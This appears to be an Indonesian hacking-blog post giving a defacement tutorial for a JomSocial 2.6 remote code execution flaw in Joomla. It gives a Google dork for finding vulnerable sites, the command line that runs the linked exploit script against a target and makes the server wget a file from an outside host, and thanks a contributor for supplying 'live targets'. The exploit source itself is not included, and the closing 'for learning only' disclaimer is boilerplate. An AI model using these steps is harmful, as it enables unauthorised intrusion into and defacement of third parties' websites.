Tutorial Deface Joomsoc 2.6 Remote Code Execution


holaa <3
walach dah mau tahun baru aja nih :3 dan sampe sekarang w blom mempunyai pacar ilmu yang lebih banyak lagi :3 ok langsung aja Tutorial Deface Joomsoc 2.6 Remote Code Execution 

bahan bahan yang dibutuhkeun adalah :
- Python versi berapa aja :3
- Exploit nya : Download here  <- save ext .py ex : exploit.py
- Google Dork : inurl:/components/com_community/ <- Kembangin ok

langkah langkah

yang pertama yang harus dilakukan adalah mencari target dengan dork diatas :3

nah klo targetnya udah ketemu buka cmd , lalu ketik command ini :
python exploit.py -u http://targetttt.com -s "wget webyangudah di hek"
nah klo mendapat pesan seperti ini
"[i] Retrieving cookies and anti-CSRF token... Done"
berarti berhasil terexploit :3 nah tinggal cek deh ke hek apa engga :3

nah ke hek deh :3

Spesial Thanks untuk mamang XenUx_404 karna udah ngasih live target :3

ok dah itu aja dari w bye :3


Sekianlah Postingan Dari GOPRESSXPLOITS Tentang " Tutorial Deface Joomsoc 2.6 Remote Code Execution " Semoga Bisa Bermanfaat!.
Anda Sekarang Sedang Membaca Postingan " Tutorial Deface Joomsoc 2.6 Remote Code Execution " Dengan URL http://www.gopressxploits.org/2017/12/tutorial-deface-joomsoc-26-remote-code.html
Jika Ada Content Yang Berbau Pantest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

Subscribe to receive free email updates:

1 Response to "Tutorial Deface Joomsoc 2.6 Remote Code Execution"